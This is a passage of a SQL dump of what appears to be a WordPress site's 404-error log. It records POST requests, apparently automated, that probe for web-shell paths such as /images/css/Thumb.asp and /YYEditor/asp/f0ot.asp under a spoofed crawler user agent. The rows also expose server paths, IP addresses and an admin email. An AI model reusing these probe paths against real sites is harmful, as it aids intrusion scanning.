Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.232.240.88\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.232.240.88\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/images/css/Thumb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/images/css/Thumb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCd92Cd74l7secq5l1iwAAAUQ\";s:12:\"REDIRECT_URL\";s:21:\"/images/css/Thumb.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"64227\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/images/css/Thumb.asp\";s:10:\"SCRIPT_URL\";s:21:\"/images/css/Thumb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCd92Cd74l7secq5l1iwAAAUQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571930743.971\";s:12:\"REQUEST_TIME\";s:10:\"1571930743\";}}','notice','2019-10-24 15:25:45','2019-10-24 15:25:44',35269440,37069072,'http://bintara.com.my//images/css/Thumb.asp',1,0,'61.232.240.88'),(28991,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//images/css/Thumb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.240.140.176\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.240.140.176\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/images/css/Thumb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/images/css/Thumb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCbd2Cd74l7secq5l1iQAAAUo\";s:12:\"REDIRECT_URL\";s:21:\"/images/css/Thumb.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"64227\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/images/css/Thumb.asp\";s:10:\"SCRIPT_URL\";s:21:\"/images/css/Thumb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCbd2Cd74l7secq5l1iQAAAUo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930733.3139\";s:12:\"REQUEST_TIME\";s:10:\"1571930733\";}}','notice','2019-10-24 15:25:35','2019-10-24 15:25:33',35337336,37129512,'http://bintara.com.my//images/css/Thumb.asp',1,0,'61.240.140.176'),(28990,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//YYEditor/asp/f0ot.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"124.240.85.166\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"124.240.85.166\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/YYEditor/asp/f0ot.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/YYEditor/asp/f0ot.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCZN2Cd74l7secq5l1hgAAAVQ\";s:12:\"REDIRECT_URL\";s:22:\"/YYEditor/asp/f0ot.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"64018\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/YYEditor/asp/f0ot.asp\";s:10:\"SCRIPT_URL\";s:22:\"/YYEditor/asp/f0ot.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCZN2Cd74l7secq5l1hgAAAVQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930724.8989\";s:12:\"REQUEST_TIME\";s:10:\"1571930724\";}}','notice','2019-10-24 15:25:26','2019-10-24 15:25:25',35269672,37074336,'http://bintara.com.my//YYEditor/asp/f0ot.asp',1,0,'124.240.85.166'),(28989,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//YYEditor/asp/f0ot.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"124.67.16.137\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"124.67.16.137\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/YYEditor/asp/f0ot.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/YYEditor/asp/f0ot.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCVt2Cd74l7secq5l1gAAAAVU\";s:12:\"REDIRECT_URL\";s:22:\"/YYEditor/asp/f0ot.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"63563\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/YYEditor/asp/f0ot.asp\";s:10:\"SCRIPT_URL\";s:22:\"/YYEditor/asp/f0ot.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCVt2Cd74l7secq5l1gAAAAVU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930710.6186\";s:12:\"REQUEST_TIME\";s:10:\"1571930710\";}}','notice','2019-10-24 15:25:12','2019-10-24 15:25:11',35344240,37144944,'http://bintara.com.my//YYEditor/asp/f0ot.asp',1,0,'124.67.16.137'),(28988,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//castleAsp/img/b.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"220.192.105.3\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"220.192.105.3\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/castleAsp/img/b.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/castleAsp/img/b.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCUKHtjB8Y0WvpqtvMDwAAAME\";s:12:\"REDIRECT_URL\";s:20:\"/castleAsp/img/b.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"63368\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/castleAsp/img/b.asp\";s:10:\"SCRIPT_URL\";s:20:\"/castleAsp/img/b.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCUKHtjB8Y0WvpqtvMDwAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930704.4697\";s:12:\"REQUEST_TIME\";s:10:\"1571930704\";}}','notice','2019-10-24 15:25:06','2019-10-24 15:25:04',35269616,37074728,'http://bintara.com.my//castleAsp/img/b.asp',1,0,'220.192.105.3'),(28987,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//castleAsp/img/b.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"122.206.85.235\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"122.206.85.235\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/castleAsp/img/b.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/castleAsp/img/b.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCSUq-QPicCh3WFsYnswAAAJI\";s:12:\"REDIRECT_URL\";s:20:\"/castleAsp/img/b.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"63185\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/castleAsp/img/b.asp\";s:10:\"SCRIPT_URL\";s:20:\"/castleAsp/img/b.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCSUq-QPicCh3WFsYnswAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930698.0823\";s:12:\"REQUEST_TIME\";s:10:\"1571930698\";}}','notice','2019-10-24 15:25:00','2019-10-24 15:24:58',35733432,37542968,'http://bintara.com.my//castleAsp/img/b.asp',1,0,'122.206.85.235'),(28986,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//gund/css/xiaying.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"58.206.76.55\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"58.206.76.55\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/gund/css/xiaying.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/gund/css/xiaying.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCOEq-QPicCh3WFsYnqQAAAJI\";s:12:\"REDIRECT_URL\";s:21:\"/gund/css/xiaying.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"62515\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/gund/css/xiaying.asp\";s:10:\"SCRIPT_URL\";s:21:\"/gund/css/xiaying.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCOEq-QPicCh3WFsYnqQAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930680.2588\";s:12:\"REQUEST_TIME\";s:10:\"1571930680\";}}','notice','2019-10-24 15:24:42','2019-10-24 15:24:40',35341712,37141704,'http://bintara.com.my//gund/css/xiaying.asp',1,0,'58.206.76.55'),(28985,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//data/data/index.php\";s:14:\"CONTENT_LENGTH\";s:3:\"298\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"203.191.146.156\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"203.191.146.156\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/data/data/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/data/data/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbHCJd2Cd74l7secq5l1ewAAAUU\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/data/data/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/data/data/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHCJd2Cd74l7secq5l1ewAAAUU\";s:12:\"REDIRECT_URL\";s:15:\"/data/index.php\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"61746\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/data/data/index.php\";s:10:\"SCRIPT_URL\";s:20:\"/data/data/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHCJd2Cd74l7secq5l1ewAAAUU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1571930661.35\";s:12:\"REQUEST_TIME\";s:10:\"1571930661\";}}','notice','2019-10-24 15:24:23','2019-10-24 15:24:21',35268136,37076224,'http://bintara.com.my//data/data/index.php',1,0,'203.191.146.156'),(28984,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//admin/djijc/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"210.26.172.7\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"210.26.172.7\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/admin/djijc/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/admin/djijc/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBrN2Cd74l7secq5l1ZwAAAVM\";s:12:\"REDIRECT_URL\";s:22:\"/admin/djijc/index.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"58894\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/admin/djijc/index.asp\";s:10:\"SCRIPT_URL\";s:22:\"/admin/djijc/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBrN2Cd74l7secq5l1ZwAAAVM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930540.3366\";s:12:\"REQUEST_TIME\";s:10:\"1571930540\";}}','notice','2019-10-24 15:22:22','2019-10-24 